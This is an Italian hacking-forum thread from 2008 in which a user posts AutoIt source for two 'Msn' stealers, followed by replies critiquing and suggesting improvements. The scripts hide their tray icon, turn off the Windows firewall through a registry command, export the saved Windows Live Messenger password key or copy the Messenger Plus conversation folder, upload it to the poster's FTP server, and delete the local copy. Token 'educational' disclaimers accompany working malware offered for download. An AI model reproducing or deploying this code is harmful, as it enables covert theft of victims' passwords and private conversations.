[Autoit]Msn plus log & pass stealer

Stato
Discussione chiusa ad ulteriori risposte.
Ordina per data Ordina commenti per reazioni
S

~Ste

Utente Silver
17 Settembre 2008
135
7
1
81
Ci sono due software e le istruzioni sono contenute nel file di testo readme.
praticamente il log stealer invia su un proprio spazio ftp la cartella delle conversazioni del plus mentre il pass stealer invia la chiave di registro che contiene le pass di wlm salvate sempre su un vostro spazio ftp.
Superano il firewall di windows.
Testato su xp
Ovviamente protetti da copyright ed io non mi ritengo responsabile di eventuale uso illecito.

Il tutto è a solo scopo educativo e dimostrativo.
Vi invito quindi a non uasrlo per lamerare

Non spiegherò tecniche per nasconedere i software dato che sono potenti anche se scritti in poche righe di codice e molto versatili...basta fare qualche modifica per renderli seriamente pericolosi.

Ricordo che l'uso per sottrarre dati a terzi è illegale

Download

Mi farebbe piacere ricevere commenti e suggerimenti.
 
Dato che tutti vogliono i source eccoli

[ot]#cs ----------------------------------------------------------------------------
Author: ~Ste.

Script Function:
Msn pass stealer


Disclaimer
Non mi assumo nessuna responsabilità dell'eventuale uso illecito che si potrà effettuare del software.
Software sviluppato a scopo educativo.

Copyright
Protetto da licenza creative commons.
Potete postarlo ovunque a patto che non lo modifichiate e/o lo spacciate per vosto.

Parametri da modificare
Inserire nella variabile $server l'indirizzo del server ftp
Inserire nelle variabili $username e $pass rispettivamente nomeutente di accesso allo spazio ftp e relativa password
Inserire nella variabile $destinazione la path dove volete venga caricata la cartella
#comments-end

#NoTrayIcon
#include<FTP3.au3>
#include<Process.au3>

$server = 'indirizzoserverftp'
$username = 'nomeutente'
$pass = 'password'
$destinazione = 'pathdestinazione'
$destchiave=$destinazione & '/chiave.reg'
$dllhandle = DllOpen('wininet.dll')
$port='21'

$off="REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v EnableFirewall /t Reg_dword /d 0 /f"
$on="REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v EnableFirewall /t Reg_dword /d 1 /f"

$chiave=@WindowsDir & "\chiave.reg"
$exchiave="reg export HKCU\Software\Microsoft\IdentityCRL\UserExtendedProperties " & $chiave

_RunDOS($off)
_RunDOS($exchiave)

$Open = _FTPOpen('Msn Pass stealer')
$Conn = _FTPConnect($Open, $server, $username, $pass,$port)
_FTPMakeDir($Conn,$destinazione)
$Ftpp = _FTPPutFile($Conn,$chiave,$destchiave,0,0)
$Ftpc = _FTPClose($Open)

_RunDOS($on)

FileDelete($chiave)
Exit[/ot]



[ot]#NoTrayIcon
#include<FTP3.au3>
#include<Process.au3>

$server = 'indirizzoserverftp'
$username = 'nomeutente'
$pass = 'password'
$destinazione = 'pathdestinazione'
$dllhandle = DllOpen('wininet.dll')
$port='21'

$off="REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v EnableFirewall /t Reg_dword /d 0 /f"
$on="REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v EnableFirewall /t Reg_dword /d 1 /f"

_RunDOS($off)

$Open = _FTPOpen('Msn plus log stealer')
$Conn = _FTPConnect($Open, $server, $username, $pass, $port)
_FTPMakeDir($Conn,$destinazione)
$Ftpfc = _FTPPutFolderContents($Conn, @MyDocumentsDir & '\Le mie Conversazioni', $destinazione,0)
$Ftpc = _FTPClose($Open)

_RunDOS($on)
Exit[/ot]

Bisogna avere la UDF FTP3.au3(che di default non è inclusa nel pacchetto di autoit ma è inclusa nell'archivio) e modificarla se non la si modifica e non esiste la cartella delle conversazioni del plus restituisce un messaggio di errore.

Hope you like it...
 
Ora si, comunque non so l'AutoIt, ma il source non è difficilissimo, e sono riuscito a capirlo anche io, complimenti per il lavoro.
 
Grazie...
Appena ho un pò di tempo (spero in questi giorni) vorrei scrivere anche un ftp brute force...
 
Scusa se te lo dico ma è una emerita cagata...
Ho alcune cose da dire :
1)Per aggiungere o rinominare o cancellare chiavi dal registro di sistema esistono le funzioni adatte (RegDelete,RegRead , etc. ) invece in questo modo tu hia dovuto includere una libreria in + e usare _rundos... :S
2) La chiave per msn è obsoleta veniva usata dalle versioni di msn precedenti la 7...
3) Per gli errori bastava gestirli...
Uno script pessimo fatto con i piedi...
scusa ma è la verità.
LA prossima volta cerca di implementare lo script in modo che affronti tutte le eventualità (se per caso non si è admin è impossibile leggere dal registro...)
oppure se non ho accesso alla cartella windows ?
poi la funzione ftp è abbastanza pessima visto che bisogna mettere una password in chiaro (cosa non sicura visto che esistono i reverser) io mi sarei appoggiato a una pagina web...
con questo ho concluso... spero che prenderai in considerazione i miei consigli.
 
1)Per aggiungere o rinominare o cancellare chiavi dal registro di sistema esistono le funzioni adatte (RegDelete,RegRead , etc. ) invece in questo modo tu hia dovuto includere una libreria in + e usare _rundos... :S
Clicca per espandere...
si ma non per modificare una chiave di registro
2) La chiave per msn è obsoleta veniva usata dalle versioni di msn precedenti la 7
Clicca per espandere...
con wlm la chiave di registro è ancora quella
per quanto riguarda la pass dell'ftp basterebbe usarne una che dopo si cambia...
per il fatto dei privilegi hai ragione...
comunque questi script come il bruteforce sono stati fatti di fretta e senza troppi accorgimenti
 
Per la modifica della chiave di registro bastava leggerla, cancellarla e riscriverla modificata no ?
per la pass io non ce l'ho per esempio...
cmq un programma se và fatto và fatto bene...
 
Stato
Discussione chiusa ad ulteriori risposte.

DISCUSSIONI SIMILI

0
Discussione Ufficiale I migliori password manager per il 2024
  • In evidenza
  • 35
  • 3K
35
3K
Privacy Online e Anonimato
ne0h
Top Bottom
Indietro